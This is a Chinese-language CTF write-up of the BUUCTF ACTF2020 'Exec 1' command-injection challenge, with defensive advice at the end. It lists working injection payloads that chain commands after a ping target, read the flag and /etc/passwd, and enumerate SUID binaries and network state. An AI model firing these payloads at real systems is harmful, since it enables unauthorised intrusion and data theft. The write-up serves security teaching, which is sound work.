BUUCTF[ACTF2020 新生赛]Exec 1漏洞分析与实战利用
1. Exec 1漏洞背景与初步分析
BUUCTF作为国内知名的CTF练习平台,每年都会更新大量优质题目。ACTF2020新生赛中的Exec 1就是一道典型的命令注入漏洞实战题。这道题的设计初衷是帮助初学者理解Web应用中命令执行的原理和危害。
我第一次接触这道题时,发现它的界面非常简单 - 就是一个PING功能测试页面。表面上看只能输入IP地址进行网络连通性测试,但实际上暗藏玄机。通过查看网页源码,可以确认后端使用了类似system()或exec()这样的危险函数来直接执行系统命令。这种设计在真实开发中绝对是大忌,但在CTF比赛中却成了绝佳的教学案例。
提示:命令注入漏洞常年位居OWASP Top 10,是Web安全领域的重点防范对象
2. 漏洞原理深度剖析
2.1 命令注入的本质
命令注入漏洞的核心在于:应用程序将用户输入直接拼接到了系统命令中。以这道题为例,当我们在输入框输入"127.0.0.1"时,后端实际执行的可能是:
ping -c 3 127.0.0.1问题出在,这个拼接过程没有任何过滤和转义。想象一下,如果在输入时使用分号(;)这个Linux命令分隔符,就能实现命令注入。比如输入:
127.0.0.1;ls实际执行的命令就变成了:
ping -c 3 127.0.0.1;ls这样就能在ping命令执行完毕后,继续执行ls命令列出当前目录内容。这就是典型的命令注入攻击。
2.2 常见危险函数分析
在PHP中,有几个函数特别容易引发命令注入问题:
- system() - 执行外部程序并显示输出
- exec() - 执行外部程序
- passthru() - 执行外部程序并显示原始输出
- shell_exec() - 通过shell执行命令
这些函数如果直接接收用户输入而不做任何处理,就会成为安全漏洞的温床。我在实际审计代码时,看到这些函数就会特别警惕,一定会检查它们的参数是否经过严格过滤。
3. 漏洞利用实战演练
3.1 基础利用:目录遍历
根据题目描述,我们可以通过分号注入多个命令。首先尝试查看当前目录:
127.0.0.1;ls如果成功执行,说明漏洞确实存在。接下来可以尝试目录遍历:
127.0.0.1;ls ../通过不断添加../可以向上级目录探索:
127.0.0.1;ls ../../../../../这种手法在CTF中很常见,因为flag文件通常存放在根目录或特定目录下。
3.2 获取flag文件
经过目录遍历后,最终payload应该是:
127.0.0.1;cat ../../../../../../flag这个命令会先执行ping,然后直接读取flag文件内容。在实际渗透测试中,我们可能还需要尝试其他路径,比如:
127.0.0.1;find / -name flag*或者查看常见flag存放位置:
127.0.0.1;cat /flag 127.0.0.1;cat /var/www/html/flag 127.0.0.1;cat /home/flag4. 防御方案与最佳实践
4.1 输入过滤与验证
要防范命令注入,首要任务就是对用户输入进行严格过滤。可以采用以下方法:
- 白名单验证:只允许特定字符(如数字和点号)用于IP地址输入
- 转义特殊字符:将;、&、|等shell元字符进行转义
- 使用正则表达式验证输入格式
例如在PHP中可以这样实现:
if(!preg_match('/^[0-9.]+$/', $input)) { die("Invalid input"); }4.2 使用安全的API替代方案
更好的做法是避免直接使用系统命令。比如PING功能可以用PHP的socket实现:
$ping = fsockopen($ip, 80, $errno, $errstr, 2); if($ping) { echo "Host is up"; fclose($ping); } else { echo "Host is down"; }4.3 最小权限原则
即使必须使用系统命令,也应该遵循最小权限原则:
- 使用特定用户运行Web服务,而不是root
- 限制该用户的权限范围
- 使用chroot等机制限制文件系统访问
5. 渗透测试技巧总结
在真实环境中测试命令注入漏洞时,我通常会尝试以下payload:
基本测试:
;whoami ;id环境信息收集:
;uname -a ;cat /etc/passwd网络探测:
;ifconfig ;netstat -tulnp文件系统探索:
;find / -perm -4000 ;ls -la /home/*
记住,在实际渗透测试中一定要获得授权,这些技术只应用于合法的安全评估。我在一次企业测试中就遇到过因为命令注入导致的严重数据泄露案例,最终帮助企业修复了这个高危漏洞。